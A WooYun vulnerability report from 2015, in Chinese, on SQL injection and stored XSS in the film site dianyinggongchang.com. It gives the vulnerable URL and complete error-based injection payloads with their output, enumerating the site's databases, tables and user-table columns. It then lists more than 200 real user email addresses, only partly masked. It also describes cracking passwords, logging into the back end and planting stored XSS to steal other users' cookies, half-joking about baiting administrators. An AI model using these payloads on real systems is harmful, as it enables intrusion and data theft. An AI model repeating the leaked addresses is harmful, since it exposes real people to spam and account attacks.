当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099810

漏洞标题:电影工厂网存储跨站+注射漏洞(手工floor强制报错)

相关厂商:电影工厂

漏洞作者: 千斤拨四两

提交时间:2015-03-09 14:57

修复时间:2015-04-23 14:58

公开时间:2015-04-23 14:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注射出员工用户名密码,发布消息,发布消息出存在存储xss,内部的发送邮件出也有存储xss。

详细说明:

URL:
http://www.dianyinggongchang.com/?c-feedback-a-addfeedback
poc:

爆出数据库版本,数据库,用户名:
cont=1' and (select 1 from (select count(*),concat(version(),0x3a,database(),0x3a,user(),0x3a,floor(rand(0)*2))x from information_schema.tables 
group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '5.1.49-community:m:m@localhost:1' for key 'group_key'
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM 
information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'information_schema'~1' for key 'group_key'
得到第一个库information_schema
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'m'~1' for key 'group_key' 得到第二个库m
爆m数据库的表
m的16进制为:0x6D
爆m数据库的表总数:
cont= 1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.tables where 
table_schema=0x6D)) from information_schema.tables limit 0,1),0x7e,0x27,floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '22~'1' for key 'group_key'
得到m数据库的表总数22
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'm_advarea~'1' for key 'group_key'
得到m数据库的第一个表m_advarea
以此类推修改行数,爆出m数据库所有的表名:
m_advarea
m_album
m_bulletin
m_comment
m_complaints
m_favorites
m_feedback
m_friend
m_help
m_link
m_message
m_share
m_tool
m_user
m_webinfo
m_work
p_region
s_advarea_adv
s_tool_category
s_tool_tag
s_user_actor
s_user_file
爆表m_user的字段
user的16进制为:0x6D5F75736572
爆m_user表的字段总数:
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.columns where 
table_name=0x6D5F75736572 and table_schema=0x6D)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from 
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
得到m_user表的字段总数17
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '17~'1' for key 'group_key'
得到m_user表的第一个字段uid
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct column_name FROM information_schema.columns where 
table_name=0x6D5F75736572 and table_schema=0x6D limit 0,1)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from 
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'uid~'1' for key 'group_key'
以此类推m_user中17个字段:
uid
username
realname
sex
province
city
jobs1
jobs2
jobs3
birthday
regtime
regip
pwd
avatar
num
hots
isbirthday


下面是员工用户名密码:



mask 区域


*****+-----------------*****
*****| username        *****
*****+-----------------*****
*****| jayrao2008@Yahoo*****
*****| jipeng91@126.com*****
*****| syy-777@163.com *****
*****| 35216536@qq.com *****
*****| 734486274@qq.com*****
*****| 58341239@qq.com *****
*****| bgorange@qq.com *****
*****| freeguojian@foxm*****
*****| llh506@sina.com *****
*****| yanyawen@gmail.c*****
*****| 1281940136@qq.co*****
*****| vo_lohas@163.com*****
*****| yuyuivv8844@163.*****
*****| 215786449@qq.com*****
*****| yanerle@126.com *****
*****| xuexd000@hotmail*****
*****| lavie384@sina.cn*****
*****| 1029899076@qq.co*****
*****| zyx2236@hotmail.*****
*****| peopegov@163.com*****
*****| yechangqing@sanm*****
*****| 477645943@qq.com*****
*****| xt8151@yahoo.com*****
*****| 599088938@qq.com*****
*****| dudu8030@163.com*****
*****| yda321@163.com  *****
*****| jessicahfbbcwv@h*****
*****| sufei2945@126.co*****
*****| 291556519@qq.com*****
*****| 1826906845@qq.co*****
*****| wsyxgood@163.com*****
*****| asd63513838@163.*****
*****| zhenganzhao@163.*****
*****| guang7846@yahoo.*****
*****| bcyjs@yahoo.com.*****
*****| szw02100210@163.*****
*****| 945025464@qq.com*****
*****| maoxiaoyang1990@*****
*****| liubinhong008@ya*****
*****| 1940425259@qq.co*****
*****| bianju8@163.com *****
*****| xxsyilzt@sina.co*****
*****| 342137949@qq.com*****
*****| eheart_chen@163.*****
*****| quanzhou7@163.co*****
*****| waihuikoo21@163.*****
*****| haizi_504@hotmai*****
*****| sunstory0629@sin*****
*****| 10000peng@126.co*****
*****| 285326882@qq.com*****
*****| wangyi1198@qq.co*****
*****| 798069400@qq.com*****
*****| 18601213469@163.*****
*****| xx.xx_xx.xx_xx.x*****
*****| tian966322@163.c*****
*****| 38072781@qq.com *****
*****| huhaoran77@foxma*****
*****| 398869866@qq.com*****
*****| lucas.ours@gmail*****
*****| wdz77110@126.com*****
*****| gpforyou@163.com*****
*****| 1316877336@qq.co*****
*****| 644641790@qq.com*****
*****| fxg882000@yahoo.*****
*****| fxg882000@yahoo.*****
*****| 1664491504@qq.co*****
*****| 381616464@qq.com*****
*****| anikijiro@gmail.*****
*****| bove168@126.com *****
*****| 304431373@qq.com*****
*****| 1425504278@qq.co*****
*****| 1044385886@qq.co*****
*****| dinggewenhua@163*****
*****| ll0504@126.com  *****
*****| blackknight_gao@*****
*****| hongshaorou1979@*****
*****| 413061625@qq.com*****
*****| ywl23@163.com   *****
*****| jxm0918@126.com *****
*****| 573244409@qq.com*****
*****| zzzzz5qqqq4@163.*****
*****| 1561442215@qq.co*****
*****| tongxiaofeng125@*****
*****| HK2004328@126.co*****
*****| 942422940@qq.com*****
*****| 2470171384@qq.co*****
*****| darenyingzhi@163*****
*****| wangjie900123@12*****
*****| 543252931@qq.com*****
*****| 122070690@qq.com*****
*****| 68358016@qq.com *****
*****| 549160754@qq.com*****
*****| 30216094@qq.com *****
*****| xiaofenggu0307@g*****
*****| 523042884@qq.com*****
*****| 1607017386@qq.co*****
*****| 690929672@qq.com*****
*****| ufenok@rambler.r*****
*****| 1004732269@qq.co*****
*****| zkbn@163.com    *****
*****| kekejustdo@163.c*****
*****| 2272367272@qq.co*****
*****| fanwenp@sina.com*****
*****| zhurikun@fanhall*****
*****| www.498502213@qq*****
*****| senggai@gmail.co*****
*****| 26044551@qq.com *****
*****| xcns@yahoo.cn   *****
*****| lion.brige@gmail*****
*****| jixialove@sina.c*****
*****| 610866678@qq.com*****
*****| zlqll1314@163.co*****
*****| 2303719@qq.com  *****
*****| 570963877@qq.com*****
*****| qq_dong@hotmail.*****
*****| jinf.gao@gmail.c*****
*****| lingdao63@163.co*****
*****| xiaochuang0413@s*****
*****| 769725972@qq.com*****
*****| shaozhenbin@qq.c*****
*****| yang91227@163.co*****
*****| treeing616@hotma*****
*****| 306846817@qq.com*****
*****| 783594010@qq.com*****
*****| 350332625@qq.com*****
*****| donjian041218@gm*****
*****| ueuu@163.com    *****
*****| 511749418@qq.com*****
*****| testcopy@tom.com*****
*****| kevinwzj@hotmail*****
*****| hoyo365@163.com *****
*****| hezhikun1987@126*****
*****| lucsun@hotmail.c*****
*****| mary_871224@163.*****
*****| abudule@126.com *****
*****| 465478519@qq.com*****
*****| wannian365@qq.co*****
*****| chao_43@163.com *****
*****| haowl@zctt.com  *****
*****| scz83321588@163.*****
*****| 1045445765@qq.co*****
*****| yaojinglive@126.*****
*****| w772612563a@qq.c*****
*****| qq@943645894.com*****
*****| 274815590@qq.com*****
*****| shuaiguoqingsy@1*****
*****| wxj.1971@yahoo.c*****
*****| meanboy@163.com *****
*****| zhdrz_444@163.co*****
*****| cailipinggeili@1*****
*****| 122784253@QQ.com*****
*****| 55281608@qq.com *****
*****| 328344796@qq.com*****
*****| 1530071692@qq.co*****
*****| dayibu123@sohu.c*****
*****| hobbyxie@live.cn*****
*****| 1058607914@qq.co*****
*****| 17344333@qq.com *****
*****| 717104266@qq.com*****
*****| 1211604894@qq.co*****
*****| 1010434449@qq.co*****
*****| 2251182873@qq.co*****
*****| 214876384@qq.com*****
*****| caosen1974@qq.co*****
*****| 391637412@qq.com*****
*****| 158621477852@163*****
*****| 158621477852@163*****
*****| liyidi1983@hotma*****
*****| gaoshuaiyouxiang*****
*****| shiq@163.com    *****
*****| sjzez12star@163.*****
*****| watcher486@gmail*****
*****| 1172648654@qq.co*****
*****| KIMZEWEN@163.COM*****
*****| 13998430333@139.*****
*****| 88509795@163.com*****
*****| jinhongjiang88@y*****
*****| 3425885@qq.com  *****
*****| aufoochu@aliyun.*****
*****| 93916405@QQ.com *****
*****| 1050401562@qq.co*****
*****| 326709447@qq.com*****
*****| hekunyang@hotmai*****
*****| ameliagaojun@gma*****
*****| 410306331@qq.com*****
*****| 779146373@qq.com*****
*****| 492039363@qq.com*****
*****| dubo1976@126.com*****
*****| 2419734135@qq.co*****
*****| 44423442@qq.com *****
*****| yangyu5633@sina.*****
*****| zlcomein@126.com*****
*****| 1261601460@qq.co*****
*****| 1103984931@qq.co*****
*****| daxingeking@163.*****
*****| 693421475@qq.com*****
*****| liangjb9527@126.*****
*****| malance1019@163.*****
*****| 183555955@qq.com*****
*****| yzh-m@qq.com    *****
*****| houjue@qq.com   *****
*****| houjue@qqq.com  *****
*****| jym5236@126.com *****
*****| qiuweiluky@163.c*****
*****| 1198892911@qq.co*****
*****| eghany@163.com  *****
*****| 363247465@qq.com*****
*****| 082045@163.com  *****
*****| 1181052048@qq.co*****
*****| zhuohjj@126.com *****
*****| xgwd_001@sina.co*****
*****| wudi14@hotmail.c*****
*****| 249910595@qq.com*****
*****| profish@126.com *****
*****| 785777051@qq.com*****
*****| cookiesiyi@126.c*****
*****| liasas@163.com  *****
*****| chenslei@qq.com *****
*****| lykk1017@163.com*****
*****| rhea_liu@msn.com*****
*****| tutu-130@163.com*****
*****| 279895234@qq.com*****
*****| louisianafrancis*****
*****| benkoa@163.com  *****
*****| 1097221523@qq.co*****
*****| moguizaixinli@16*****
*****| 1131752209@qq.co*****
*****| laukailam@qq.com*****
*****| 20146697@qq.com *****
*****| zhead@139.om    *****
*****| zysee@hotmail.co*****
*****| weiyimaizui@qq.c*****
*****| starwmx520@163.c*****
*****| 865383699@QQ.com*****
*****| 36848427@qq.com *****
*****| onlyonlycong@163*****
*****| elainejuanzi@163*****
*****| zyb_651@sina.com*****
*****| 493637387@qq.com*****
*****| fanghon8994@sina*****
*****| luqien@hotmail.c*****
*****| haifeng.v@gmail.*****
*****| xie525@sina.com *****
*****| mengdie116@163.c*****
*****| dagong188@sina.c*****
*****| 15815513075@126.*****
*****| 1009501589@qq.co*****
*****| 345869593@qq.com*****
*****| 5qing@5qing.net *****
*****| angel_h18@sina.c*****
*****| hoozi@126.com   *****
*****| lanruo2005@yahoo*****
*****| aaaaliang@hotmai*****
*****| fly230@qq.com   *****
*****| gywdq@126.com   *****
*****| dzhwang@163.com *****
*****--+--------------*****


漏洞证明:

解密员工md5密码,进入后台发布帖子:

q.png


标题栏,内容,图片说明都存在xss,嵌入代码,下面看看效果:

1.png


登录另一个用户点击测试:

2.png


3.png


直接打到cookie。
后台还有一处发送邮件功能,继续测试:

4.png


登录测试用户的后台收取邮件:

5.png


6.jpg


成功打到cookie:

gg.png


哈哈,测试成功,要是测试管路员的话,标题比较吸引,你们懂的!!!

修复方案:

你们更专业!!!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论